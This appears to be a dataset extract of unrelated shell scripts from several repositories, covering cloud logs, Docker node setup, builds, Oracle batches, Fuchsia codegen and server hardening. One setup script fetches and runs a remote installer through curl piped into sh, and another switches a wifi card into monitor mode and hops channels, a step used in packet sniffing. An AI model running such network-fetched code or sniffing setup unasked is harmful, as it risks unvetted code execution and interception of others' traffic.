blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
9fd42b30502e3280ba7873b49fbc7b2b54e42c80
|
Shell
|
pfarrell/emr-scripts
|
/bin/get_logs.sh
|
UTF-8
| 188
| 2.859375
| 3
|
[] |
no_license
|
#! /bin/bash
job=$1
case "$job" in
last) job=`emr --list --state COMPLETED 2>/dev/null| head -1 | sed -e 's: .*::g'`;;
esac
s3cmd get -r "${HADOOP_LOG_DIR}/$job" logs
open logs/$job
| true
|
81a6652f26f9ff8d2efc3240ed7a27018ee605fa
|
Shell
|
aceburgess/monitor-packets-scripts
|
/monitor-mode.sh
|
UTF-8
| 238
| 3.078125
| 3
|
[] |
no_license
|
#! /bin/bash
ifconfig wlan0 down && iw dev wlan0 set type monitor && ifconfig wlan0 up
echo "You're entering Monitor Mode on wlan0"
while [ 1 ]; do
for CHANUM in {1..11}; do
iwconfig wlan0 channel $CHANUM
sleep 1
done
done
| true
|
5dd86dd4549bc120fd7e5c34bcafa29e3f800577
|
Shell
|
VeriBlock/samples
|
/scripts/docker_nodecore_bootstrap.sh
|
UTF-8
| 2,588
| 4.3125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
echo "This script will generate a directory, install the latest nodecore bootstrap, and start a docker image which will start nodecore. Make sure you are running this as root!"
read -p "Continue (y/n)?" choice
case "$choice" in
y|Y ) echo "yes";;
n|N ) exit 0;;
* ) exit 0;;
esac
LATEST_BOOTSTRAP=`curl -s https://explore.veriblock.org/api/stats/download | jq -r .bootstrapfile_zip`
BOOTSTRAP="$(basename $LATEST_BOOTSTRAP)"
echo "Starting script!"
## Shoutout panda
echo "Checking to see if your system meets the minimum requirements for NodeCore to run..."
TOTALMEM=$(cat /proc/meminfo | head -n 1 | tr -d -c 0-9)
TOTALMEM=$(($TOTALMEM/1000000))
echo System Memory: $TOTALMEM GB
TOTALCORES=$(nproc)
echo System Cores: $TOTALCORES
TOTALDISK=$(df -H "$HOME" | awk 'NR==2 { print $2 }' | tr -d -c 0-9)
echo Disk Size: $TOTALDISK GB
FREESPACE=$(df -H "$HOME" | awk 'NR==2 { print $2 }' | tr -d -c 0-9)
echo Free Disk Space: $FREESPACE GB
if [ $TOTALMEM -lt 4 ]
then
echo "Sorry, but this system needs at least 4GB of RAM for NodeCore to run. Exiting Install..."
exit
elif [ $TOTALCORES -lt 2 ]
then
echo "Sorry, but this system needs at least 2 cores for NodeCore to run. Exiting Install..."
exit
elif [ $TOTALDISK -lt 50 ]
then
echo "Sorry, but this system needs at least 50GB total disk space for NodeCore to run. Exiting Install..."
exit
elif [ $FREESPACE -lt 15 ]
then
echo "Sorry, but this system needs at least 15GB free disk space for NodeCore to run. Exiting Install..."
exit
else
echo "Your system is suitable, continuing installation of NodeCore..."
fi
echo "========================"
docker > /dev/null 2>&1
if [ $? != 0 ]
then
echo "Please install Docker!"
exit 0
else
echo "Docker is installed!"
fi
echo "========================="
mkdir -p /root/nc_data/mainnet
echo "/root/_nc_data/mainnet directory created"
echo "========================="
sleep 5
echo "downloading the latest bootstrap"
wget -P /root/nc_data/mainnet $LATEST_BOOTSTRAP
echo "========================="
unzip /root/nc_data/mainnet/$BOOTSTRAP -d /root/nc_data/mainnet/
echo "bootstrap unzipped!"
echo "========================="
echo "rpc.whitelist.addresses=172.17.0.1" > /root/nc_data/nodecore.properties
echo "Added docker0 bridge to nodecore.properties"
echo "========================="
sleep 5
echo "starting docker image"
docker run -d --name scripttest -v /root/nc_data:/data -p 7500:7500 -p 10500:10500 docker.io/veriblock/nodecore
echo "docker image started"
sleep 5
echo "========================="
docker ps
| true
|
656ac5d50422bcb629cf493c9077c4159e559a41
|
Shell
|
gemichelst/changeDate.app
|
/CreateAPP
|
UTF-8
| 1,194
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# copy icons, plist and gtouch
APP_NAME=changeDate
DIR_CURRENT=`pwd`
echo "current-dir: $DIR_CURRENT"
if [ ! -d "$DIR_CURRENT/APP/$APP_NAME.app" ];
then
echo "APP-DIR: [failed]"
exit 0
fi
echo "APP-DIR: [OK]"
if [ ! -d "$DIR_CURRENT/SRC" ];
then
echo "SRC-DIR: [failed]"
exit 0
fi
echo "SRC-DIR: [OK]"
if [ ! -f "$DIR_CURRENT/SRC/Info.plist" ];
then
echo "Info.plist: [failed]"
exit 0
else
rm "$DIR_CURRENT/APP/$APP_NAME.app/Contents/Info.plist"
cp "$DIR_CURRENT/SRC/Info.plist" "$DIR_CURRENT/APP/$APP_NAME.app/Contents/Info.plist"
echo "Info.plist: [OK]"
fi
if [ ! -f "$DIR_CURRENT/SRC/changeDate.icns" ];
then
echo "changeDate.icns: [failed]"
exit 0
else
cp "$DIR_CURRENT/SRC/changeDate.icns" "$DIR_CURRENT/APP/$APP_NAME.app/Contents/Resources/changeDate.icns"
echo "changeDate.icns: [OK]"
fi
if [ ! -f "$DIR_CURRENT/SRC/gtouch" ];
then
echo "gtouch: [failed]"
exit 0
else
cp "$DIR_CURRENT/SRC/gtouch" "$DIR_CURRENT/APP/$APP_NAME.app/Contents/Resources/gtouch"
echo "gtouch: [OK]"
fi
echo "> preparation completed ..."
rm *.bz2 *.dmg
echo "> creating DMG ..."
make all
exit 0
| true
|
5b5911ca8f405d7744c21d2d3031bdd74b54a5b5
|
Shell
|
naggenius/BIP
|
/BIP_App-master/UX/batch/shell/MANNUEL/alimsuivijhr.sh
|
ISO-8859-1
| 1,590
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/ksh
#_______________________________________________________________________________
# Application Base d'Informations Projets
# Nom du fichier : alimsuivijhr.sh
# Objet : Shell batch alimsuivijhr (tous les traitements mensuels)
# Shell d'alimentation de la table suivijhr qui sert pour l'\351dition du suivi des remontee jh
# on alimente les donn\351es du mois de mensuelle
#
#_______________________________________________________________________________
# Creation : ARE 22/08/2002
# Modification :
# --------------
# Auteur Date Objet
# EGR 14/10/02 Migration ksh SOLARIS 8
#
################################################################################
# Obsolete
#################################################
# On charge l'environnement
#################################################
. $APP_ETC/bipparam.sh
#################################################
# Trace de l'execution du batch
# dans le repertoire des logs
RESULT_FILE=$DIR_BATCH_SHELL_LOG/alimsuivijhr.`date +"%Y%m%d"`.log
# appel SQL*PLUS (mode silencieux -s) avec trace execution
# utilise le login unix (a definir dans la base)
sqlplus -s $ORA_USR_LIVE@$ORA_LIVE <<! > $RESULT_FILE
whenever sqlerror exit failure;
execute pack_suivijhr.alim_suivijhr;
!
# valeur de sortie de SQL*PLUS
PLUS_EXIT=$?
if [ $PLUS_EXIT -ne 0 ]
then
print 'Problme SQL*PLUS dans batch alimsuivijhr : consulter ' $RESULT_FILE
print "et le fichier $DIR_BATCH_SHELL_LOG/AAAA.MM.JJ.alimsuivijhr.log du jour"
exit -1;
fi
print 'ALIMSUIVIJHR OK'
exit 0
| true
|
2dd51d9861590dc2bc7b2e33ee86551bc4fdbf94
|
Shell
|
gnoliyil/fuchsia
|
/src/devices/tools/fidlgen_banjo/regen_banjo_tests.sh
|
UTF-8
| 4,380
| 2.9375
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# Copyright 2020 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
set -e
if [[ ! -d "${FUCHSIA_BUILD_DIR}" ]]; then
echo "FUCHSIA_BUILD_DIR environment variable not a directory; are you running under fx exec?" 1>&2
exit 1
fi
BANJO_DIR="$FUCHSIA_DIR/src/devices/tools/fidlgen_banjo/"
FIDL_IR_FILE="${FUCHSIA_BUILD_DIR}/fildgen_banjo_test_ir.json"
FIDL_FILES="$BANJO_DIR/tests/fidl"
C_FILES="$BANJO_DIR/tests/c"
CPP_FILES="$BANJO_DIR/tests/cpp"
RUST_FILES="$BANJO_DIR/tests/rust"
AST_FILES="$BANJO_DIR/tests/ast"
FIDLGEN_BANJO="$FUCHSIA_BUILD_DIR/host_x64/exe.unstripped/fidlgen_banjo"
FIDLC="$FUCHSIA_BUILD_DIR/host_x64/exe.unstripped/fidlc"
FILE="$1"
for f in $FIDL_FILES/*
do
filename=$(basename -- "$f")
extension="${filename##*.*.}"
filename="${filename%.*.*}"
if [ ! -z "$FILE" ] && [ "$filename" != "$FILE" ]; then
continue
fi
if [ "$extension" != "fidl" ]; then
continue
fi
if [ "$filename" = "badtype" ]; then
continue
fi
if [ "$filename" = "librarypart_two" ]; then
continue
fi
dependencies=""
with_c=true
with_cpp=true
with_cpp_mock=false
with_rust=true
if [ "$filename" = "callback" ] || [ "$filename" = "simple" ] || [ "$filename" = "interface" ] \
|| [ "$filename" = "protocolbase" ] || [ "$filename" = "api" ] \
|| [ "$filename" = "passcallback" ] || [ "$filename" = "fidlhandle" ] \
|| [ "$filename" = "handles" ] || [ "$filename" = "protocolarray" ] \
|| [ "$filename" = "protocolvector" ] || [ "$filename" = "tables" ] \
|| [ "$filename" = "example9" ] || [ "$filename" = "protocolhandle" ] \
|| [ "$filename" = "types" ] || [ "$filename" = "order4" ] || [ "$filename" = "order5" ]; then
dependencies="$dependencies --files $FUCHSIA_DIR/zircon/vdso/rights.fidl $FUCHSIA_DIR/zircon/vdso/zx_common.fidl"
fi
if [ "$filename" = "order6" ]; then
dependencies="$dependencies --files $FIDL_FILES/order7.test.fidl"
fi
if [ "$filename" = "view" ]; then
dependencies="$dependencies --files $FIDL_FILES/point.test.fidl"
fi
if [ "$filename" = "callback" ]; then
dependencies="$dependencies --files $FIDL_FILES/callback2.test.fidl"
fi
if [ "$filename" = "enums" ] || [ "$filename" = "bits" ] || [ "$filename" = "types" ] \
|| [ "$filename" = "example0" ] || [ "$filename" = "example1" ] \
|| [ "$filename" = "example2" ] || [ "$filename" = "example3" ] \
|| [ "$filename" = "alignment" ] || [ "$filename" = "example8" ] || [ "$filename" = "point" ] \
|| [ "$filename" = "tables" ]; then
with_cpp=false
fi
if [ "$filename" = "passcallback" ] || [ "$filename" = "protocolarray" ] \
|| [ "$filename" = "protocolbase" ] || [ "$filename" = "protocolhandle" ] \
|| [ "$filename" = "protocolothertypes" ] || [ "$filename" = "protocolprimitive" ] \
|| [ "$filename" = "protocolvector" ] || [ "$filename" = "interface" ]; then
with_cpp_mock=true
fi
if [ "$filename" = "rustderive" ]; then
with_c=false
with_cpp=false
fi
if [ "$filename" = "parameterattributes" ]; then
with_rust=false
with_c=false
with_cpp=false
fi
if [ "$filename" = "handles" ]; then
with_rust=false
fi
if [ "$filename" = "constants" ] || [ "$filename" = "order" ] || [ "$filename" = "union" ] \
|| [ "$filename" = "order1" ] || [ "$filename" = "order2" ] || [ "$filename" = "order3" ] \
|| [ "$filename" = "order4" ] || [ "$filename" = "order5" ] || [ "$filename" = "order6" ] \
|| [ "$filename" = "order7" ]; then
with_cpp=false
with_rust=false
fi
echo "Regenerating $filename"
$FIDLC --json "${FIDL_IR_FILE}" $dependencies --files $f
if [ $with_c = true ]; then
$FIDLGEN_BANJO --backend C --output "$C_FILES/$filename.h" --ir "${FIDL_IR_FILE}"
fi
if [ $with_cpp = true ]; then
$FIDLGEN_BANJO --backend cpp --output "$CPP_FILES/$filename.h" --ir "${FIDL_IR_FILE}"
$FIDLGEN_BANJO --backend cpp_internal --output "$CPP_FILES/$filename-internal.h" --ir "${FIDL_IR_FILE}"
fi
if [ $with_cpp_mock = true ]; then
$FIDLGEN_BANJO --backend cpp_mock --output "$CPP_FILES/mock-$filename.h" --ir "${FIDL_IR_FILE}"
fi
if [ $with_rust = true ]; then
$FIDLGEN_BANJO --backend rust --output "$RUST_FILES/$filename.rs" --ir "${FIDL_IR_FILE}"
fi
done
| true
|
0597835370438b495f38fde4ee9fafed32a31431
|
Shell
|
Ner0/arch-pantheon
|
/Unstable/pantheon-dock/PKGBUILD
|
UTF-8
| 1,265
| 2.859375
| 3
|
[] |
no_license
|
# Maintainer: Ner0
pkgname=pantheon-dock-bzr
pkgver=704
pkgrel=1
pkgdesc="The dock for elementary Pantheon, built on the awesome foundation of Plank."
arch=('i686' 'x86_64')
url="https://launchpad.net/pantheon-dock"
license=('GPL3')
groups=('pantheon')
depends=('bamf' 'glib2' 'gtk3' 'libgee' 'libwnck3' 'libx11' 'python2' 'hicolor-icon-theme' 'cairo' 'pango' 'libdbusmenu-gtk3')
makedepends=('bzr' 'dbus-glib' 'intltool' 'pkg-config' 'vala' 'gnome-common')
conflicts=('plank-bzr')
provides=("plank-bzr=$pkgver")
options=('!libtool')
install=pantheon-dock.install
_bzrtrunk=lp:pantheon-dock
_bzrmod=pantheon-dock
build() {
msg "Connecting to Bazaar server...."
if [ -d $_bzrmod ]; then
cd $_bzrmod && bzr pull $_bzrtrunk -r $pkgver && cd ..
msg "The local files are updated."
else
bzr branch $_bzrtrunk $_bzrmod -r $pkgver
fi
msg "BZR checkout done or server timeout"
msg "Starting make..."
rm -rf $_bzrmod-build
cp -rf $_bzrmod $_bzrmod-build
cd $_bzrmod-build
./autogen.sh --prefix=/usr --sysconfdir=/etc
make ${MAKEFLAGS}
}
package() {
cd "$_bzrmod-build/"
make GCONF_DISABLE_MAKEFILE_SCHEMA_INSTALL=1 DESTDIR="$pkgdir/" install
sed -i 's/python/python2/' "$pkgdir/usr/share/apport/package-hooks/source_plank.py"
}
| true
|
33894ddf460d04340290ba682e2acc8c9dcee901
|
Shell
|
smartqubit/rhsso-with-ext-postgresql-db-cli
|
/cleanup.sh
|
UTF-8
| 785
| 2.765625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#EXIT ON ERROR
#set -e
BASEDIR=$(dirname "$0")
. ${BASEDIR}/sso_env.sh
rm ${CACERT_FILENAME} ${CAKEY_FILENAME} *.srl ${HTTPS_KEYSTORE_FILENAME} ${JGROUPS_ENCRYPT_KEYSTORE} ${SSOCERT} ${SSOSIGNREQ} ${SSO_TRUSTSTORE_FILENAME}
echo "switch to ${SSO_NAMESPACE} project"
error=$(oc project ${SSO_NAMESPACE})
if [ $? -eq 0 ]; then
echo "OK! "
else
echo $error
exit 1
fi
#oc delete secret env-datasource
oc delete secret cli-scripts -n ${SSO_NAMESPACE}
oc delete secret ${HTTPS_SECRET} -n ${SSO_NAMESPACE}
oc policy remove-role-from-user view system:serviceaccount:$(oc project -q):sso-service-account
oc delete serviceaccount sso-service-account -n ${SSO_NAMESPACE}
oc delete -f ${BASEDIR}/sso73-https-postgresql-external-cli.yaml -n ${SSO_NAMESPACE}
| true
|
0d614e7ce5809cc6245b3aa02ad3bd80a5ddffed
|
Shell
|
LunaNyan/my_little_server_ubuntu
|
/setup.sh
|
UTF-8
| 3,717
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Load config
. config.sh
# first, remember current directory, then go to your glorious home
cwd=$(pwd)
cd ~
# Make minimal home structure
mkdir apps workspace
# Update
sudo apt update
sudo apt upgrade -y
# Install essential packages
sudo apt install htop nano zsh wget python3-dev python3-pip screen
# Set some kernel params
sed -i 's/#net.ipv4.conf.default.rp_filter=1/net.ipv4.conf.default.rp_filter=1/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.rp_filter=1/net.ipv4.conf.all.rp_filter=1/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.accept_source_route = 0/net.ipv4.conf.all.accept_source_route = 0/' /etc/sysctl.conf
sed -i 's/#net.ipv6.conf.all.accept_source_route = 0/net.ipv6.conf.all.accept_source_route = 0/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.send_redirects = 0/net.ipv4.conf.all.send_redirects = 0/' /etc/sysctl.conf
sed -i 's/#net.ipv4.tcp_syncookies=1/net.ipv4.tcp_syncookies=1/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.log_martians = 1/net.ipv4.conf.all.log_martians = 1/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.accept_redirects = 0/net.ipv4.conf.all.accept_redirects = 0/' /etc/sysctl.conf
sed -i 's/#net.ipv6.conf.all.accept_redirects = 0/net.ipv6.conf.all.accept_redirects = 0/' /etc/sysctl.conf
sysctl -p
# Install Oh My Zsh and apply my own theme
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
git clone https://github.com/lunanyan/dragon-zsh-theme
mv ./dragon-zsh-theme/dragon.zsh-theme ~/.oh-my-zsh/custom/themes/dragon.zsh-theme
rm -rfv ./dragon-zsh-theme
# (Optional) Install Jupyter
if [ "$c_jupyter" = true ] ; then
pip3 install jupyterlab -y
jupyter notebook --generate-config
sed "s/#c.NotebookApp.ip = 'localhost'/c.NotebookApp.ip = '*'/" ~/.jupyter/jupyter_notebook_config.py
sed "s/#c.NotebookApp.allow_origin = ''/c.NotebookApp.allow_origin = '*'/" ~/.jupyter/jupyter_notebook_config.py
sed "s/#c.NotebookApp.port = 8888/c.NotebookApp.port = 30000/" ~/.jupyter/jupyter_notebook_config.py
echo "from notebook.auth import passwd; passwd()" | python3
fi
# (Optional) Set iptables rules
if [ "$c_iptables" = true ] ; then
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dports 80,443 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --dports 80,443 -m conntrack --ctstate ESTABLISHED -j ACCEPT
iptables -A INPUT -j LOG
iptables -A FORWARD -j LOG
ip6tables -A INPUT -j LOG
ip6tables -A FORWARD -j LOG
netfilter-persistent save
fi
# (Optional) Block cn ip
if ["$c_blockcnip" = true ] ; then
git clone https://github.com/LunaNyan/china_fucking
cd china_fucking
sudo ./china_fucking_iptables.sh
cd ..
rm -rf china_fucking
fi
# (Optional) Install Minecraft Server
if [ "$c_mcserver" = true ] ; then
sudo apt install openjdk-8-jre-headless
cd apps
mkdir minecraft_server
cd minecraft_server
wget -O server.jar $c_mcserver_uri
cp $cwd/toolbox/server.properties .
cp $cwd/toolbox/server.sh .
echo "eula=true" > eula.txt
fi
| true
|
f6b5864c9fefd917d4959a3a4cc17778b2c1127d
|
Shell
|
FutureApp/a-bench
|
/admin.sh
|
UTF-8
| 12,783
| 3.5
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
#@ Author: Michael Czaja <michael-czaja-arbeit@hotmail.de>
LB='\033[1;34m'
RR='\033[1;31m'
NC='\033[0m' # No Color
bench_tag=${LB}[A-Bench]${NC}
home_framework=$(pwd)
home_bench_sub_bigbench=$home_framework/submodules/bigbenchv2
home_container_bench=/bigbenchv2
# all functions calls are indicated by prefix <util_xxx>
source dir_bench/lib_bench/shell/util.sh
# all functions calls are indicated by prefix <kubernetes_xxx>
source dir_bench/lib_bench/shell/kubernetes.sh
# all functions calls are indicated by prefix <bench_xx>
source dir_bench/lib_bench/shell/bench.sh
if [[ $# -eq 0 ]] ; then
util_print_help
exit 0
fi
for var in "$1"
do
case $var in
#--------------------------------------------------------------------------------[ ABench - Presteps ]--
(auto_install) # -- Triggers all mechanism to install all req. components
bench_installMissingComponents
;;
#---------------------------------------------------------------------[ ABench - Infrastructure ]--
(senv_a) # -- Starts abench in config A with Kubernetes and Minikube
bench_preflight
numberCPUs=${2:-2} # Sets default value 4 CPUs
numberMemory=${3:-6144} # Sets default value 6144 MB
numberDiskSizeGB="${4:-16}g"
minikube delete
minikube start --cpus $numberCPUs --memory $numberMemory --disk-size $numberDiskSizeGB || \
( echo "ERROR. Check the error-message, resolve the problem and then try again." && \
exit 1)
# minikube after work
# workaround to handle time based desync between host and minikube
# src: https://github.com/kubernetes/minikube/issues/1378
minikube ssh -- docker run -it --rm --privileged --pid=host alpine nsenter \
-t 1 -m -u -n -i date -u $(date -u +%m%d%H%M%Y)
util_sleep 10
eval $(minikube docker-env)
minikube addons enable addon-manager
minikube addons enable default-storageclass
minikube addons enable dashboard
minikube addons enable storage-provisioner
minikube addons enable heapster
helm init
util_sleep 10
# -----------
# starts the influxDB-collector-client
kubectl apply -f ./dir_bench/images/influxdb-client/kubernetes/deploy_influxdb-client.yaml
kubectl create -f ./dir_bench/images/influxdb-client/kubernetes/service_influxdb-client.yaml
kubernetes_waitUntilAllPodsAvailable 11 40 10 # expected containers; retrys; sleep-time[s]
#### END
echo -e "${bench_tag} Startup procedure was successfully."
echo -e "${bench_tag} If you like to interact with docker in minikube then remember to link your docker with the one in minikube."
echo -e """${bench_tag} To do so, use the follwing command:
eval \$(minikube docker-env)
"""
;;
(senv_b) # -- Starts the framework-env. in config. B within a cloud-infrastructure - not supported -
echo "The framework doesn't support the configuration B (cloud-env) right now."
;;
#---------------------------------------------------------------------[ Live-Monitoring ]--
(show_all_das) # -- Opens all *-dashboards
./$0 show_grafana_das &
sleep 10;
./$0 show_kuber_das
;;
(show_grafana_das) # -- Opens the Grafan-dashboard.
mini_ip=$(minikube ip)
linkToDashboard="http://$(minikube ip):30002/dashboard/db/pods?orgId=1&var-namespace=kube-system&var-podname=etcd-minikube&from=now-15m&to=now&refresh=10s"
xdg-open $linkToDashboard
;;
(show_kuber_das) # -- Opens the Kubernetes-dashboard
minikube dashboard
;;
#---------------------------------------------------------------------[ Export data ]--
(export_data) # -- Exports measurments. In1: sTime; In2: eTime; In3:location
echo "exporting data now"
s_time=$2
e_time=$3
location="$4"
echo "Input-parameter: $@"
ipxport_data_client=$(bench_minikube_nodeExportedK8sService_IPxPORT influxdb-client)
echo "minikube detected: $ipxport_data_client"
url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
echo "Calling the following URl <$url>"
curl $url --output $location
echo "Data(saved) location: $location"
;;
#--------------------------------------------------------------------------------[ Experiments ]--
(demo_from_scratch_sre) # -- Deploys abench (config A); Runs a single-run-experiment [BBV2-Modul]
./$0 senv_a
sleep 15
mini_ip=$(minikube ip)
linkToDashboard="http://$(minikube ip):30002/dashboard/db/pods?orgId=1&var-namespace=kube-system&var-podname=etcd-minikube&from=now-15m&to=now&refresh=10s"
# opens some dash-boards
xdg-open $linkToDashboard &
minikube dashboard &
# downloads the sub-module bbv2
./$0 down_submodules
# experiment execution
./$0 run_sample_sre_bbv
url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
;;
(demo_from_scratch_mre) # -- Deploys abench (config A); Runs a multi-run-experiment [BBV2-Modul]
./$0 senv_a
sleep 15
mini_ip=$(minikube ip)
linkToDashboard="http://$(minikube ip):30002/dashboard/db/pods?orgId=1&var-namespace=kube-system&var-podname=etcd-minikube&from=now-15m&to=now&refresh=10s"
# opens some dash-boards
xdg-open $linkToDashboard &
minikube dashboard &
# downloads the sub-module bbv2
./$0 down_submodules
# experiment execution
./$0 run_sample_mre_bbv
#url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
;;
(demo_from_scratch_env) # -- Deploys abench (config A); Runs an env-run-experiment [BBV2-Modul]
./$0 senv_a
sleep 15
mini_ip=$(minikube ip)
linkToDashboard="http://$(minikube ip):30002/dashboard/db/pods?orgId=1&var-namespace=kube-system&var-podname=etcd-minikube&from=now-15m&to=now&refresh=10s"
# opens some dash-boards
xdg-open $linkToDashboard &
minikube dashboard &
# downloads the sub-module bbv2
./$0 down_submodules
export TEST_QUERIES="q16" &&\
export EX_TAG="experiment_tag_sample" &&\
./$0 run_by_env_bbv
#url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
;;
#-----------------------------------------------------------------------------------------[ Modules ]--
# Here is a good place to insert code which download your framework or benchmark
(down_submodules) # -- Downloads or updates all ABench-modules
./$0 down_bbv_two
echo "Download has finished [down_all]"
;;
(down_bbv_two) # -- Downloads or updates the bbv2-module
mkdir -p submodules
cd submodules
git clone https://github.com/FutureApp/bigbenchv2.git
cd bigbenchv2 && git pull
echo "Download has finished [bbv2-modul]"
;;
#------------------------------------------------------------------------------------[ Mod_ENV ]--
(start_bbv_hive) # -- Starts a minimal hive-experiment-infrastructure [BBV2]
./$0 down_bbv_two
cd submodules/bigbenchv2/a-bench_connector/experiments/env-run-experiment/
bash ENV_experiment_demoHIVE.sh cus_build
bash ENV_experiment_demoHIVE.sh cus_deploy
echo "Hive-ENV deployed"
;;
(start_bbv_spark) # -- Starts a minimal spark-experiment-infrastructure [BBV2]
./$0 down_bbv_two
cd submodules/bigbenchv2/a-bench_connector/experiments/env-run-experiment/
bash ENV_experiment_demoSPARK.sh cus_build
bash ENV_experiment_demoSPARK.sh cus_deploy
echo "Spark-ENV deployed"
;;
#----------------------------------------------------------------------------------[ Custom - Runners ]--
(run_sample_sre_bbv) # -- Executes the SRE_experiment_demoHIVE.sh experiment in [BBV2]
cd submodules/bigbenchv2/a-bench_connector/experiments/single-run-experiment/
bash SRE_experiment_demoHIVE.sh run_ex # Contains the implementation of the experiment. Like build,deploy and execution orders.
;;
(run_sample_mre_bbv) # -- Executes the MRE_experiment_demoHIVE.sh experiment in [BBV2] 2 x times
cd submodules/bigbenchv2/a-bench_connector/experiments/multi-run-experiment/
bash MRE_experiment_demoHIVE.sh run_ex 2 # Contains the implementation of the experiment. Like build,deploy and execution orders.
;;
(run_sample_sre_spark) # -- Executes the SRE_experiment_demoSPARK.sh experiment in [BBV2]
cd submodules/bigbenchv2/a-bench_connector/experiments/single-run-experiment/
bash SRE_experiment_demoSPARK.sh run_ex # Contains the implementation of the experiment. Like build,deploy and execution orders.
;;
#----------------------------------------------------------------------------------------[ API - ENV-Ex ]--
(run_by_env_bbv_hive) # -- Uses the ENV- Experiments in [BBV2] for Hive
TEST_QUERIES_TO_CALL=($TEST_QUERIES)
if [ -z "$TEST_QUERIES_TO_CALL" ] ; then
echo "Attention. No queries detected. Check the System-ENV > TEST_QUERIES"
else
echo "ENV-Looper-Experiment is starting now."
for test_query in ${TEST_QUERIES_TO_CALL[@]}; do
echo "Running $test_query"
cd submodules/bigbenchv2/a-bench_connector/experiments/env-run-experiment/
bash ENV_experiment_demoHIVE.sh run_ex $test_query
done
fi
cd -
;;
(run_by_env_bbv_spark) # -- Uses the ENV- Experiments in [BBV2] for SPARk
TEST_QUERIES_TO_CALL=($TEST_QUERIES)
if [ -z "$TEST_QUERIES_TO_CALL" ] ; then
echo "Attention. No queries detected. Check the System-ENV > TEST_QUERIES"
else
echo "ENV-Looper-Experiment is starting now."
for test_query in ${TEST_QUERIES_TO_CALL[@]}; do
echo "Running $test_query"
cd submodules/bigbenchv2/a-bench_connector/experiments/env-run-experiment/
bash ENV_experiment_demoSPARK.sh run_ex $test_query
done
fi
cd -
;;
#------------------------------------------------------------------------------[ Abench-Images ]--
(build_all_dockerimages) # -- Builds all docker-images below
./$0 dev_build_dataserver
./$0 dev_build_bbv_two_modul
;;
(build_dataserver) # -- Builds the basis image of the abench data-server
#builds the data-server componente
cd ./dir_bench/images/influxdb-client/image/ && docker build -t data-server . && \
docker build -t jwgumcz/data-server . && \
cd -
# code to build other componentes belongs here
;;
(build_bbv_two_modul) # -- Builds the basis image of the bbv2-module
#builds the bbv2-modul image
./$0 down_bbv_two
cd submodules/bigbenchv2/a-bench_connector/images/hive
docker build -t jwgumcz/abench_bbv2 .
cd -
;;
#---------------------------------------------------------------------------------------[ DEV ]--
(dev_con) # -- Connects to the bench-driver pod via kubernates-function
kubectl exec -it thadoop-hadoop-bench-driver-0 bash
;;
(dev_code) # -- Executes dev-related code.
docker rmi -f data-server
kubectl delete -f ./dir_bench/images/influxdb-client/kubernetes/deploy_influxdb-client.yaml
kubectl delete -f ./dir_bench/images/influxdb-client/kubernetes/service_influxdb-client.yaml
util_sleep 60
kubectl apply -f ./dir_bench/images/influxdb-client/kubernetes/deploy_influxdb-client.yaml
kubectl create -f ./dir_bench/images/influxdb-client/kubernetes/service_influxdb-client.yaml
util_sleep 60
ipxport_data_client=$(bench_minikube_nodeExportedK8sService_IPxPORT influxdb-client)
;;
(dev_pcc) # -- Executes dev-related code for testing code-snipped's
./$0 dev_code
s_time=$(bench_UTC_TimestampInNanos)
util_sleep 100
e_time=$(bench_UTC_TimestampInNanos)
set -o xtrace
ipxport_data_client=$(bench_minikube_nodeExportedK8sService_IPxPORT influxdb-client)
url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
data_location="./experi.zip"
echo "Calling the following URl <$url>"
curl "$url" --output $data_location
echo "Data is saved under $data_location"
;;
#--------------------------------------------------------------------------------------------[ Help ]--
(--help) # -- Prints the help and usage message
util_print_help
;;
(*)
util_parameter_unkown $var
echo ""
echo "Execution failed with exit-code 1"
util_print_help
exit 1
;;
esac
done
| true
|
